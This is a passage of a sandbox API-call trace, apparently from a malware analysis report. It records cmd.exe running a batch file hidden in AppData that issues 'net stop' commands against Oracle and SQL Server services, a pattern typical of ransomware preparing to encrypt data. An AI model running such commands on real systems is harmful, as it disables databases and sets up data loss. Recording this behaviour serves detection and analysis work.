(_String1="net", _String2="BREAK") returned 12 [0212.760] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0212.760] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0212.761] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0212.761] SetErrorMode (uMode=0x0) returned 0x1 [0212.761] GetProcessHeap () returned 0x3e0000 [0212.761] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0212.761] GetProcessHeap () returned 0x3e0000 [0212.761] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0212.761] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.761] GetProcessHeap () returned 0x3e0000 [0212.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0212.761] GetProcessHeap () returned 0x3e0000 [0212.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0212.762] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0212.762] GetProcessHeap () returned 0x3e0000 [0212.762] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0212.762] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.762] GetProcessHeap () returned 0x3e0000 [0212.762] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0212.762] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0212.762] GetProcessHeap () returned 0x3e0000 [0212.762] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0212.763] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.763] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.763] GetLastError () returned 0x2 [0212.764] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.764] GetLastError () returned 0x2 [0212.764] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.765] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.765] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.765] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.765] GetLastError () returned 0x2 [0212.766] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.766] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.766] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.767] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0212.767] SetErrorMode (uMode=0x0) returned 0x1 [0212.767] GetProcessHeap () returned 0x3e0000 [0212.767] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0212.767] GetProcessHeap () returned 0x3e0000 [0212.767] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0212.767] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.767] GetProcessHeap () returned 0x3e0000 [0212.767] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0212.767] GetProcessHeap () returned 0x3e0000 [0212.767] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0212.768] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0212.768] GetProcessHeap () returned 0x3e0000 [0212.768] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0212.768] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.768] GetProcessHeap () returned 0x3e0000 [0212.768] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0212.768] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0212.768] GetProcessHeap () returned 0x3e0000 [0212.768] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0212.769] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.769] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.769] GetLastError () returned 0x2 [0212.769] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.770] GetLastError () returned 0x2 [0212.770] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.770] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.770] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.771] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.771] GetLastError () returned 0x2 [0212.772] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.772] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.772] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.772] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0212.772] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0212.772] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0212.773] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.773] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop OracleClientCache80 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop OracleClientCache80 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop OracleClientCache80 /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x874, dwThreadId=0x2ec)) returned 1 [0212.777] CloseHandle (hObject=0x74) returned 1 [0212.777] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.777] GetProcessHeap () returned 0x3e0000 [0212.777] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.777] GetEnvironmentStringsW () returned 0x3f8408* [0212.777] GetProcessHeap () returned 0x3e0000 [0212.777] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.777] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.777] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0212.918] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0212.918] CloseHandle (hObject=0x78) returned 1 [0212.918] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0212.918] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0212.918] GetProcessHeap () returned 0x3e0000 [0212.918] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.918] GetEnvironmentStringsW () returned 0x3f8408* [0212.918] GetProcessHeap () returned 0x3e0000 [0212.918] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.919] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.919] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.919] GetProcessHeap () returned 0x3e0000 [0212.919] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.919] GetEnvironmentStringsW () returned 0x3f8408* [0212.919] GetProcessHeap () returned 0x3e0000 [0212.919] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.919] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.919] GetProcessHeap () returned 0x3e0000 [0212.920] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0212.920] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0212.920] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.920] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0212.920] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.920] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0212.920] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.920] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0212.920] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.920] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0212.920] SetConsoleInputExeNameW () returned 0x1 [0212.920] GetConsoleOutputCP () returned 0x1b5 [0212.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0212.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0212.921] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0212.921] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.921] SetFilePointer (in: hFile=0x78, lDistanceToMove=5259, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x148b [0212.921] GetProcessHeap () returned 0x3e0000 [0212.921] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0212.921] GetProcessHeap () returned 0x3e0000 [0212.921] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0212.921] GetProcessHeap () returned 0x3e0000 [0212.921] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0212.921] GetProcessHeap () returned 0x3e0000 [0212.921] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0212.921] GetProcessHeap () returned 0x3e0000 [0212.921] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0212.921] GetProcessHeap () returned 0x3e0000 [0212.921] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0212.921] GetProcessHeap () returned 0x3e0000 [0212.921] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0212.921] GetProcessHeap () returned 0x3e0000 [0212.921] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0212.921] GetProcessHeap () returned 0x3e0000 [0212.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0212.922] GetProcessHeap () returned 0x3e0000 [0212.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0212.922] GetProcessHeap () returned 0x3e0000 [0212.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0212.922] GetProcessHeap () returned 0x3e0000 [0212.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0212.922] GetProcessHeap () returned 0x3e0000 [0212.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0212.922] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.922] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x148b [0212.922] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x436, lpOverlapped=0x0) returned 1 [0212.922] SetFilePointer (in: hFile=0x78, lDistanceToMove=5294, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14ae [0212.922] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=35, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$PROFXENGAGEMENT /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 35 [0212.922] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.922] GetFileType (hFile=0x78) returned 0x1 [0212.922] _get_osfhandle (_FileHandle=3) returned 0x78 [0212.923] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14ae [0212.923] GetProcessHeap () returned 0x3e0000 [0212.923] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0212.923] GetProcessHeap () returned 0x3e0000 [0212.923] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0212.926] _tell (_FileHandle=3) returned 5294 [0212.926] _close (_FileHandle=3) returned 0 [0212.926] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0212.926] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0212.926] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0212.926] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0212.926] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0212.926] _wcsicmp (_String1="net", _String2="CD") returned 11 [0212.926] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0212.926] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0212.926] _wcsicmp (_String1="net", _String2="REN") returned -4 [0212.926] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0212.926] _wcsicmp (_String1="net", _String2="SET") returned -5 [0212.926] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0212.926] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0212.926] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0212.926] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0212.927] _wcsicmp (_String1="net", _String2="MD") returned 1 [0212.927] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0212.927] _wcsicmp (_String1="net", _String2="RD") returned -4 [0212.927] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0212.927] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0212.927] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0212.927] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0212.927] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0212.927] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0212.927] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0212.927] _wcsicmp (_String1="net", _String2="VER") returned -8 [0212.927] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0212.927] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0212.927] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0212.927] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0212.927] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0212.927] _wcsicmp (_String1="net", _String2="START") returned -5 [0212.927] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0212.927] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0212.927] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0212.927] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0212.927] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0212.927] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0212.927] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0212.927] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0212.927] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0212.927] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0212.928] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0212.928] SetErrorMode (uMode=0x0) returned 0x1 [0212.928] GetProcessHeap () returned 0x3e0000 [0212.928] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0212.928] GetProcessHeap () returned 0x3e0000 [0212.928] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0212.928] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.928] GetProcessHeap () returned 0x3e0000 [0212.928] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0212.929] GetProcessHeap () returned 0x3e0000 [0212.929] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0212.929] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0212.929] GetProcessHeap () returned 0x3e0000 [0212.929] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0212.929] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.929] GetProcessHeap () returned 0x3e0000 [0212.929] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0212.929] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0212.929] GetProcessHeap () returned 0x3e0000 [0212.929] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0212.930] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.930] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.930] GetLastError () returned 0x2 [0212.931] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.931] GetLastError () returned 0x2 [0212.931] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.932] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.932] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.932] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.932] GetLastError () returned 0x2 [0212.933] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.933] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.933] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.934] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0212.934] SetErrorMode (uMode=0x0) returned 0x1 [0212.934] GetProcessHeap () returned 0x3e0000 [0212.934] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0212.934] GetProcessHeap () returned 0x3e0000 [0212.934] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0212.934] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.934] GetProcessHeap () returned 0x3e0000 [0212.934] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0212.934] GetProcessHeap () returned 0x3e0000 [0212.934] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0212.935] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0212.935] GetProcessHeap () returned 0x3e0000 [0212.935] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0212.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.935] GetProcessHeap () returned 0x3e0000 [0212.935] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0212.935] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0212.935] GetProcessHeap () returned 0x3e0000 [0212.935] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0212.936] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.936] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.936] GetLastError () returned 0x2 [0212.936] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.937] GetLastError () returned 0x2 [0212.937] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.937] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.937] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, 